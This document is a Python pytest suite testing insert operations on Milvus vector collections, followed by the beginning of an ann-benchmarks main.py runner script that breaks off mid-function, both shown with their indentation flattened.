@pytest.mark.tags(CaseLabel.L1)
def test_insert_drop_collection(self):
"""
target: test insert and drop
method: insert data and drop collection
expected: verify collection if exist
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
collection_list, _ = self.utility_wrap.list_collections()
assert collection_w.name in collection_list
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
collection_w.drop()
collection_list, _ = self.utility_wrap.list_collections()
assert collection_w.name not in collection_list
@pytest.mark.tags(CaseLabel.L1)
def test_insert_create_index(self):
"""
target: test insert and create index
method: 1. insert 2. create index
expected: verify num entities and index
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
@pytest.mark.tags(CaseLabel.L1)
def test_insert_after_create_index(self):
"""
target: test insert after create index
method: 1. create index 2. insert data
expected: verify index and num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_after_index(self):
"""
target: test insert binary after index
method: 1.create index 2.insert binary data
expected: 1.index ok 2.num entities correct
"""
schema = cf.gen_default_binary_collection_schema()
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
collection_w.create_index(ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.indexes[0] == index
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_create_index(self):
"""
target: test create index in auto_id=True collection
method: 1.create auto_id=True collection and insert
2.create index
expected: index correct
"""
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_default_dataframe_data()
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
# create index
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
@pytest.mark.tags(CaseLabel.L2)
def test_insert_auto_id_true(self):
"""
target: test insert ids fields values when auto_id=True
method: 1.create collection with auto_id=True 2.insert without ids
expected: verify primary_keys and num_entities
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data()
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_twice_auto_id_true(self):
"""
target: test insert ids fields twice when auto_id=True
method: 1.create collection with auto_id=True 2.insert twice
expected: verify primary_keys unique
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
nb = 10
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(nb)
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
primary_keys = mutation_res.primary_keys
assert cf._check_primary_keys(primary_keys, nb)
mutation_res_1, _ = collection_w.insert(data=df)
primary_keys.extend(mutation_res_1.primary_keys)
assert cf._check_primary_keys(primary_keys, nb * 2)
assert collection_w.num_entities == nb * 2
@pytest.mark.tags(CaseLabel.L2)
def test_insert_auto_id_true_list_data(self):
"""
target: test insert ids fields values when auto_id=True
method: 1.create collection with auto_id=True 2.insert list data with ids field values
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data()
mutation_res, _ = collection_w.insert(data=data[1:])
assert mutation_res.insert_count == ct.default_nb
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_true_with_dataframe_values(self):
"""
target: test insert with auto_id=True
method: create collection with auto_id=True
expected: 1.verify num entities 2.verify ids
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: 'Auto_id is True, primary field should not have data'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
assert collection_w.is_empty
@pytest.mark.tags(CaseLabel.L2)
def test_insert_auto_id_true_with_list_values(self):
"""
target: test insert with auto_id=True
method: create collection with auto_id=True
expected: 1.verify num entities 2.verify ids
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
assert collection_w.is_empty
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_false_same_values(self):
"""
target: test insert same ids with auto_id false
method: 1.create collection with auto_id=False 2.insert same int64 field values
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 100
data = cf.gen_default_list_data(nb=nb)
data[0] = [1 for i in range(nb)]
mutation_res, _ = collection_w.insert(data)
assert mutation_res.insert_count == nb
assert mutation_res.primary_keys == data[0]
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_false_negative_values(self):
"""
target: test insert negative ids with auto_id false
method: auto_id=False, primary field values is negative
expected: verify num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 100
data = cf.gen_default_list_data(nb)
data[0] = [i for i in range(0, -nb, -1)]
mutation_res, _ = collection_w.insert(data)
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="issue 15416")
def test_insert_multi_threading(self):
"""
target: test concurrent insert
method: multi threads insert
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(ct.default_nb)
thread_num = 4
threads = []
primary_keys = df[ct.default_int64_field_name].values.tolist()
def insert(thread_i):
log.debug(f'In thread-{thread_i}')
mutation_res, _ = collection_w.insert(df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == primary_keys
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for t in threads:
t.join()
assert collection_w.num_entities == ct.default_nb * thread_num
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="Currently primary keys are not unique")
def test_insert_multi_threading_auto_id(self):
"""
target: test concurrent insert auto_id=True collection
method: 1.create auto_id=True collection 2.concurrent insert
expected: verify primary keys unique
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_insert_multi_times(self, dim):
"""
target: test insert multi times
method: insert data multi times
expected: verify num entities
"""
step = 120
nb = 12000
collection_w = self.init_collection_general(prefix, dim=dim)[0]
for _ in range(nb // step):
df = cf.gen_default_dataframe_data(step, dim)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == step
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_all_datatype_collection(self):
"""
target: test insert into collection that contains all datatype fields
method: 1.create all datatype collection 2.insert data
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_dataframe_all_data_type(nb=nb)
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name)
assert self.collection_wrap.num_entities == nb
class TestInsertAsync(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert async
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_insert_sync(self):
"""
target: test async insert
method: insert with async=True
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
future, _ = collection_w.insert(data=df, _async=True)
future.done()
mutation_res = future.result()
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_async_false(self):
"""
target: test insert with false async
method: async = false
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
mutation_res, _ = collection_w.insert(data=df, _async=False)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_async_callback(self):
"""
target: test insert with callback func
method: insert with callback func
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
future, _ = collection_w.insert(data=df, _async=True, _callback=assert_mutation_result)
future.done()
mutation_res = future.result()
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self):
"""
target: test insert with async
method: insert 5w entities with callback func
expected: verify num entities
"""
nb = 50000
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb)
future, _ = collection_w.insert(data=df, _async=True)
future.done()
mutation_res = future.result()
assert mutation_res.insert_count == nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self):
"""
target: test insert async with callback
method: insert 10w entities with timeout=1
expected: raise exception
"""
nb = 100000
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb)
future, _ = collection_w.insert(data=df, _async=True, _callback=None, timeout=0.2)
with pytest.raises(MilvusException):
future.result()
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_data(self):
"""
target: test insert async with invalid data
method: insert async with invalid data
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
columns = [ct.default_int64_field_name, ct.default_float_vec_field_name]
df = pd.DataFrame(columns=columns)
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
collection_w.insert(data=df, _async=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_partition(self):
"""
target: test insert async with invalid partition
method: insert async with invalid partition
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
err_msg = "partitionID of partitionName:p can not be find"
future, _ = collection_w.insert(data=df, partition_name="p", _async=True)
future.done()
with pytest.raises(MilvusException, match=err_msg):
future.result()
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_no_vectors_raise_exception(self):
"""
target: test insert vectors with no vectors
method: set only vector field and insert into collection
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "fleldSchema lack of vector field."}
future, _ = collection_w.insert(data=df, _async=True, check_task=CheckTasks.err_res, check_items=error)
def assert_mutation_result(mutation_res):
assert mutation_res.insert_count == ct.default_nb
class TestInsertOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert interface operations
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_insert_default_partition(self):
"""
target: test insert entities into default partition
method: create partition and insert info collection
expected: the collection insert count equals to nb
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
partition_w1 = self.init_partition_wrap(collection_w)
data = cf.gen_default_list_data(nb=ct.default_nb)
mutation_res, _ = collection_w.insert(data=data, partition_name=partition_w1.name)
assert mutation_res.insert_count == ct.default_nb
def test_insert_partition_not_existed(self):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_name param
expected: error raised
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb=ct.default_nb)
error = {ct.err_code: 1, ct.err_msg: "partitionID of partitionName:p can not be existed"}
mutation_res, _ = collection_w.insert(data=df, partition_name="p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_partition_repeatedly(self):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it repeatedly, with the partition_name param
expected: the collection row count equals to nq
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
df = cf.gen_default_dataframe_data(nb=ct.default_nb)
mutation_res, _ = collection_w.insert(data=df, partition_name=partition_w1.name)
new_res, _ = collection_w.insert(data=df, partition_name=partition_w2.name)
assert mutation_res.insert_count == ct.default_nb
assert new_res.insert_count == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self):
"""
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_name param
expected: the collection insert count equals to nq
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
partition_name = cf.gen_unique_str(prefix)
partition_w1 = self.init_partition_wrap(collection_w, partition_name=partition_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df, partition_name=partition_w1.name)
assert mutation_res.insert_count == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self):
"""
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_collection_schema_all_datatype
error = {ct.err_code: 0, ct.err_msg: "Data type is not support"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_lack_vector_field(self):
"""
target: test insert entities, with no vector field
method: remove entity values of vector field
expected: error raised
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_no_vector_field_dtype(self):
"""
target: test insert entities, with vector field type is error
method: vector field dtype is not existed
expected: error raised
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
vec_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.NONE)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
df =[field_one, field_two, vec_field]
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType."}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_no_vector_field_name(self):
"""
target: test insert entities, with no vector field name
method: vector field name is error
expected: error raised
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
vec_field = cf.gen_float_vec_field(name=ct.get_invalid_strs)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
df =[field_one, field_two, vec_field]
error = {ct.err_code: 0, ct.err_msg: "Data type is not support."}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
class TestInsertBinary(TestcaseBase):
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_partition(self):
"""
target: test insert entities and create partition
method: create collection and insert binary entities in it, with the partition_name param
expected: the collection row count equals to nb
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
partition_name = cf.gen_unique_str(prefix)
partition_w1 = self.init_partition_wrap(collection_w, partition_name=partition_name)
mutation_res, _ =collection_w.insert(data=df, partition_name=partition_w1.name)
assert mutation_res.insert_count == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_multi_times(self):
"""
target: test insert entities multi times and final flush
method: create collection and insert binary entity multi
expected: the collection row count equals to nb
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
nums = 2
for i in range(nums):
mutation_res, _ = collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb*nums
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_create_index(self):
"""
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
class TestInsertInvalid(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert invalid params
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self):
"""
target: test insert, with using auto id is invaild, which are not int64
method: create collection and insert entities in it
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
int_field = cf.gen_float_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
df =[int_field, vec_field]
error = {ct.err_code: 0, ct.err_msg: "Primary key type must be DataType.INT64."}
mutation_res, _ =collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_partition_name(self):
"""
target: test insert with invalid scenario
method: insert with invalid partition name
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
df = cf.gen_default_list_data(ct.default_nb)
error={ct.err_code: 1, 'err_msg': "partition name is illegal"}
mutation_res, _ = collection_w.insert(data=df, partition_name="p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_with_invalid_field_value(self):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
vec_field = ct.get_invalid_vectors
df =[field_one, field_two, vec_field]
error = {ct.err_code: 0, ct.err_msg: "The field of schema type must be FieldSchema."}
mutation_res, _ = collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
class TestInsertInvalidBinary(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert invalid params of binary
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_insert_ids_binary_invalid(self):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
field_one = cf.gen_float_field(is_primary=True)
field_two = cf.gen_float_field()
vec_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_binary_vec_field_name, dtype=DataType.BINARY_VECTOR)
df = [field_one, field_two, vec_field]
error = {ct.err_code: 0, ct.err_msg: "Data type is not support."}
mutation_res, _ = collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_binary_partition_name(self):
"""
target: test insert with invalid scenario
method: insert with invalid partition name
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
partition_name = ct.get_invalid_strs
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
error = {ct.err_code: 1, 'err_msg': "The types of schema and data do not match."}
mutation_res, _ = collection_w.insert(data=df, partition_name=partition_name, check_task=CheckTasks.err_res, check_items=error)
class TestInsertString(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert string
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_insert_string_field_is_primary(self):
"""
target: test insert string is primary
method: 1.create a collection and string field is primary
2.insert string field data
expected: Insert Successfully
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_string_pk_default_collection_schema()
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[2]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("string_fields", [[cf.gen_string_field(name="string_field1")],
[cf.gen_string_field(name="string_field2")],
[cf.gen_string_field(name="string_field3")]])
def test_insert_multi_string_fields(self, string_fields):
"""
target: test insert multi string fields
method: 1.create a collection
2.Insert multi string fields
expected: Insert Successfully
"""
schema = cf.gen_schema_multi_string_fields(string_fields)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_dataframe_multi_string_fields(string_fields=string_fields)
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_string_field_invalid_data(self):
"""
target: test insert string field data is not match
method: 1.create a collection
2.Insert string field data is not match
expected: Raise exceptions
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
df = cf.gen_default_dataframe_data(nb)
new_float_value = pd.Series(data=[float(i) for i in range(nb)], dtype="float64")
df.iloc[:, 2] = new_float_value
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_string_field_name_invalid(self):
"""
target: test insert string field name is invaild
method: 1.create a collection
2.Insert string field name is invalid
expected: Raise exceptions
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = [cf.gen_int64_field(),cf.gen_string_field(name=ct.get_invalid_strs), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: 'Data type is not support.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_string_field_length_exceed(self):
"""
target: test insert string field exceed the maximum length
method: 1.create a collection
2.Insert string field length is exceeded maximum value of 65535
expected: Raise exceptions
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nums = 70000
field_one = cf.gen_int64_field()
field_two = cf.gen_float_field()
field_three = cf.gen_string_field(max_length_per_row=nums)
vec_field = cf.gen_float_vec_field()
df = [field_one, field_two, field_three, vec_field]
error = {ct.err_code: 0, ct.err_msg: 'Data type is not support.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_string_field_dtype_invalid(self):
"""
target: test insert string field with invaild dtype
method: 1.create a collection
2.Insert string field dtype is invalid
expected: Raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
string_field = self.field_schema_wrap.init_field_schema(name="string", dtype=DataType.STRING)[0]
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field()
df = [string_field, int_field, vec_field]
error = {ct.err_code: 0, ct.err_msg: 'Data type is not support.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_string_field_auto_id_is_true(self):
"""
target: test create collection with string field
method: 1.create a collection
2.Insert string field with auto id is true
expected: Raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
int_field = cf.gen_int64_field()
vec_field = cf.gen_float_vec_field()
string_field = cf.gen_string_field(is_primary=True, auto_id=True)
df = [int_field, string_field, vec_field]
error = {ct.err_code: 0, ct.err_msg: 'Data type is not support.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
|
main.py
|
from __future__ import absolute_import
import argparse
import logging
import logging.config
import docker
import multiprocessing.pool
import os
import psutil
import random
import shutil
import sys
import traceback
from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.constants import INDEX_DIR
from ann_benchmarks.algorithms.definitions import (get_definitions,
list_algorithms,
algorithm_status,
InstantiationStatus)
from ann_benchmarks.results import get_result_filename
from ann_benchmarks.runner import run, run_docker
def positive_int(s):
i = None
try:
i = int(s)
except ValueError:
pass
if not i or i < 1:
raise argparse.ArgumentTypeError("%r is not a positive integer" % s)
return i
def run_worker(cpu, args, queue):
while not queue.empty():
definition = queue.get()
if args.local:
run(definition, args.dataset, args.count, args.runs, args.batch)
else:
memory_margin = 500e6 # reserve some extra memory for misc stuff
mem_limit = int((psutil.virtual_memory().available - memory_margin) / args.parallelism)
cpu_limit = str(cpu)
if args.batch:
cpu_limit = "0-%d" % (multiprocessing.cpu_count() - 1)
run_docker(definition, args.dataset, args.count,
args.runs, args.timeout, args.batch, cpu_limit, mem_limit)
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--dataset',
metavar='NAME',
help='the dataset to load training points from',
default='glove-100-angular',
choices=DATASETS.keys())
parser.add_argument(
"-k", "--count",
default=10,
type=positive_int,
help="the number of near neighbours to search for")
parser.add_argument(
'--definitions',
metavar='FILE',
help='load algorithm definitions from FILE',
default='algos.yaml')
parser.add_argument(
'--algorithm',
metavar='NAME',
help='run only the named algorithm',
default=None)
parser.add_argument(
'--docker-tag',
metavar='NAME',
help='run only algorithms in a particular docker image',
default=None)
parser.add_argument(
'--list-algorithms',
help='print the names of all known algorithms and exit',
action='store_true')
parser.add_argument(
'--force',
help='re-run algorithms even if their results already exist',
action='store_true')
parser.add_argument(
'--runs',
metavar='COUNT',
type=positive_int,
help='run each algorithm instance %(metavar)s times and use only'
' the best result',
default=5)
parser.add_argument(
'--timeout',
type=int,
help='Timeout (in seconds) for each individual algorithm run, or -1'
'if no timeout should be set',
default=2 * 3600)
parser.add_argument(
'--local',
action='store_true',
help='If set, then will run everything locally (inside the same '
'process) rather than using Docker')
parser.add_argument(
'--batch',
action='store_true',
help='If set, algorithms get all queries at once')
parser.add_argument(
'--max-n-algorithms',
type=int,
help='Max number of algorithms to run (just used for testing)',
default=-1)
parser.add_argument(
'--run-disabled',
help='run algorithms that are disabled in algos.yml',
action='store_true')
parser.add_argument(
'--parallelism',
type=positive_int,
help='Number of Docker containers in parallel',
default=1)
args = parser.parse_args()
if args.timeout == -1:
args.timeout = None
if args.list_algorithms:
list_algorithms(args.definitions)
sys.exit(0)
logging.config.fileConfig("logging.conf")
logger = logging.getLogger("annb")
# Nmslib specific code
# Remove old indices stored on disk
if os.path.exists(INDEX_DIR):
shutil.rmtree(INDEX_DIR)
dataset, dimension = get_dataset(args.dataset)
point_type = dataset.attrs.get('point_type', 'float')
distance = dataset.attrs['distance']
definitions = get_definitions(
args.definitions, dimension, point_type, distance, args.count)
# Filter out, from the loaded definitions, all those query argument groups
# that correspond to experiments that have already been run. (This might
# mean removing a definition altogether, so we can't just use a list
# comprehension.)
filtered_definitions = []
for definition in definitions:
query_argument_groups = definition.query_argument_groups
if not query_argument_groups:
query_argument_groups = [[]]
not_yet_run = []
for query_arguments in query_argument_groups:
fn = get_result_filename(args.dataset,
args.count, definition,
query_arguments, args.batch)
if args.force or not os.path.exists(fn):
not_yet_run.append(query_arguments)
if not_yet_run:
if definition.query_argument_groups:
definition = definition._replace(
query_argument_groups=not_yet_run)
filtered_definitions.append(definition)
definitions = filtered_definitions
random.shuffle(definitions)
if args.algorithm:
logger.info(f'running only {args.algorithm}')
definitions = [d for d in definitions if d.algorithm == args.algorithm]
if not args.local:
# See which Docker images we have available
docker_client = docker.from_env()
docker_tags = set()
for image in docker_client.images.list():
for tag in image.tags:
tag = tag.split(':')[0]
docker_tags.add(tag)
if args.docker_tag:
logger.info(f'running only {args.docker_tag}')
definitions = [
d for d in definitions if d.docker_tag == args.docker_tag]
if set(d.docker_tag for d in definitions).difference(docker_tags):
logger.info(f'not all docker images available, only: {set(docker_tags)}')
logger.info(f'missing docker images: '
f'{str(set(d.docker_tag for d in definitions).difference(docker_tags))}')
definitions = [
d for d in definitions if d.docker_tag in docker_tags]
else:
def _test(df):
status = algorithm_status(df)
